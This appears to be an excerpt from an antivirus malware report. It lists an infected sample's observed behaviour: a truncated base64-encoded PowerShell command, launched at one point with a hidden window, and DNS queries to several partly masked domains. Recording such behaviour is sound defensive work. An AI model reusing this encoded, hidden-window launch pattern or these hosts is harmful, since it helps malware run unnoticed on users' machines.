Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAVQB5AHoAdABnAGEAaAB1AGUAZQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBaAHUAYQB0AGsAbQBmAHYAZQBlAHoAcwAgACMAPgAgACQAWABnAHkAaQBtAHoAcwB2AGEAdgA9ACcAUQ...
- DNS ASK to#####beljepara.com
- DNS ASK he###ewelry.com
- DNS ASK da####arment.com
- DNS ASK de#####talab.aosis.net
- DNS ASK le###757.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAVQB5AHoAdABnAGEAaAB1AGUAZQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBaAHUAYQB0AGsAbQBmAHYAZQBlAHoAcwAgACMAPgAgACQAWABnAHkAaQBtAHoAcwB2AGEAdgA9ACcAUQ...' (with a hidden window)